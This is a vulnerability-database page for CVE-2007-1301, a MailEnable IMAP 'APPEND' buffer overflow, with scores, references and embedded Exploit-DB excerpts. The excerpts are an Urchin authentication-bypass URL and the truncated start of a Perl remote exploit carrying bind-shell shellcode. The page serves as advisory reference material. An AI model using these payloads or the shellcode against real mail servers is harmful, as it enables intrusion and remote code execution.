CVE-2007-1301
published 2007-03-07CVE-2007-1301: Stack-based buffer overflow in the IMAP service in MailEnable Enterprise and Professional Editions 2.37 and earlier allows remote authenticated users to…
PriorityP348critical9CVSS 2.0
AVNACLAuSCCICAC
EXPLOIT
EPSS
12.17%
95.6th percentile
Stack-based buffer overflow in the IMAP service in MailEnable Enterprise and Professional Editions 2.37 and earlier allows remote authenticated users to execute arbitrary code via a long argument to the APPEND command. NOTE: this is probably different than CVE-2006-6423.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mailenable | mailenable_professional | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Google Urchin 5.7.3 - 'Report.cgi' Authentication Bypass
exploitdb·2007-10-11
CVE-2007-5113 Google Urchin 5.7.3 - 'Report.cgi' Authentication Bypass
Google Urchin 5.7.3 - 'Report.cgi' Authentication Bypass
---
source: https://www.securityfocus.com/bid/26037/info
Google Urchin is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to gain administrative access to the vulnerable application. This may lead to other attacks.
Urchin 5.7.03 is vulnerable to this issue; other versions may also be affected.
NOTE: Further reports suggest that this is not a vulnerability, but a documented feature of the application.
http://www.example.com/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4>ype=5
Exploit-DB
MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow
exploitdb·2007-03-02
CVE-2007-1301 MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow
MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow
---
#!/usr/bin/perl
#
# maildisable-v4.pl
#
# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
# Mail Enable Professional v2.33 (win32)
# Mail Enable Professional v2.35 (win32)
# Mail Enable Professional v2.37 (win32)
#
########
use Getopt::Std; getopts('t:n:u:p:', \%arg);
use Socket;
# Fixed metasploit win32 bindshell port 1337
my $zshell_win32_bind =
"\x33\xc9\x83\xe9\xb0".
"\x81\xc4\xd0\xfd\xff\xff". # add %esp, -560
"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
"\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
"\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2"
No writeups or analysis indexed.
http://secunia.com/advisories/24361http://www.mailenable.com/hotfix/http://www.securityfocus.com/bid/22792http://www.securitytracker.com/id?1017739http://www.vupen.com/english/advisories/2007/0811https://exchange.xforce.ibmcloud.com/vulnerabilities/32801https://www.exploit-db.com/exploits/3397http://secunia.com/advisories/24361http://www.mailenable.com/hotfix/http://www.securityfocus.com/bid/22792http://www.securitytracker.com/id?1017739http://www.vupen.com/english/advisories/2007/0811https://exchange.xforce.ibmcloud.com/vulnerabilities/32801https://www.exploit-db.com/exploits/3397
2007-03-07
Published